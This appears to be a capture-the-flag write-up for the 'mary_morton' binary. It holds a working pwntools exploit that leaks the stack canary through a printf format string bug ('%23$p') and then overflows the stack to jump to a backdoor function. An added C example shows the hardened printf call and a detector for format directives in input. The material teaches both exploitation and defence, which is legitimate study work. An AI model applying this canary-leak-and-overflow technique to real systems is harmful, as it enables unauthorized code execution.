mary_morton (format string vulnerability + stack overflow)

When v3 == 2 the program passes user input straight to printf, so the format string vulnerability can be used to leak the stack canary.
Canary leak: menu option 2 triggers the format string bug, and "%23$p" prints the 23rd stack slot, which holds the canary (assumed binary path ./mary_morton; pwntools, Python 3 bytes throughout)
from pwn import *

p = process("./mary_morton")  # path to the challenge binary is assumed

p.sendline(b"2")
p.sendline(b"%23$p")
p.recvuntil(b"0x")
canary = p64(int(p.recv(16), 16))  # 16 hex digits = the 8-byte canary
Stack overflow: menu option 1 has the overflow; 0x88 bytes of padding reach the canary, followed by the leaked canary, 8 bytes of saved-rbp filler, and the return address of the backdoor function at 0x4008de
p.sendline(b"1")
payload = b"a" * 0x88 + canary + p64(0xdeadbeef) + p64(0x4008de)  # 0x4008de: backdoor function address
p.sendline(payload)
p.interactive()
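The canary leak above works only because the program uses the user's buffer as printf's format string. The following C is an added example, not code from the writeup or the challenge binary: it shows the hardened call (`printf("%s", buf)`) that makes "%23$p" inert, plus a small input check a defender can run over request bodies or logs to flag strings that contain printf conversions. The function names and the sample input are my own.

```c
#include <stdio.h>

/* Vulnerable form seen in the challenge (shown here only as a comment):
 *
 *     printf(buf);   // buf = "%23$p" reads the 23rd variadic slot: the canary
 *
 * The fix is to pass the buffer as data, never as the format. */

/* Return 1 if 's' contains a conversion printf would act on (a '%' that is
 * not the "%%" escape), 0 otherwise. A lone trailing '%' is also flagged,
 * since printf's behaviour on it is undefined. */
int has_format_directive(const char *s)
{
    for (size_t i = 0; s[i] != '\0'; i++) {
        if (s[i] != '%')
            continue;
        if (s[i + 1] == '%') {   /* literal percent sign, "%%" */
            i++;
            continue;
        }
        return 1;
    }
    return 0;
}

/* Hardened echo: the user buffer is an argument to a fixed format string, so
 * "%23$p" is printed verbatim instead of dereferencing the stack. Returns the
 * number of characters written. */
int safe_echo(const char *buf)
{
    return printf("%s\n", buf);
}

int main(void)
{
    const char *input = "%23$p";   /* constructed sample: the leak payload */
    printf("directive present: %d\n", has_format_directive(input));  /* 1 */
    safe_echo(input);              /* prints the literal text %23$p */
    return 0;
}
```

The check is deliberately coarse: any string with an unescaped '%' is flagged, which is the right bias when the question is "could this input be interpreted as a format string by a careless printf".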
